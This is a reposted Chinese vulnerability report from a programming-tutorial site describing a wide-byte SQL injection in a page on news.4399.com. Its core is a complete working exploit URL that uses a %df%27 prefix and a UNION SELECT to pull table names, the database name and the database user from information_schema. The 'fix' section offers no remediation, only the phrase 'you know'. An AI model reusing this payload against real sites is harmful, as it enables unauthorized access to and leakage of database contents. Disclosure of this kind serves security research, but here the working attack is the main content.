好得很程序员自学网

<tfoot draggable='sEl'></tfoot>

4399一处SQL注射及修复 - 网站安全 - 自学php

简要描述: 多字节编码问题引起的SQL注入,导致数据库信息泄漏. 详细说明:

漏洞证明:

 

http://news.4399.com/list/index.php?w=h&s=&l=&x=&a=%df%27 AND 1=2 UNION SELECT 1,2,3,4,TABLE_NAME,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,database(),user(),34,35,36,37,38,39,40,41,42 from information_schema.TABLES where TABLE_SCHEMA = 0x6E65777334333939%23

修复方案: 你懂的...

查看更多关于4399一处SQL注射及修复 - 网站安全 - 自学php的详细内容...

声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://www.haodehen.cn/did11400
  阅读:53次

上一篇: ET语音跨站脚本漏洞及修复 - 网站安全 - 自学ph

下一篇:Oracle 注入基础及相关特性总结 - 网站安全 - 自学

相关资讯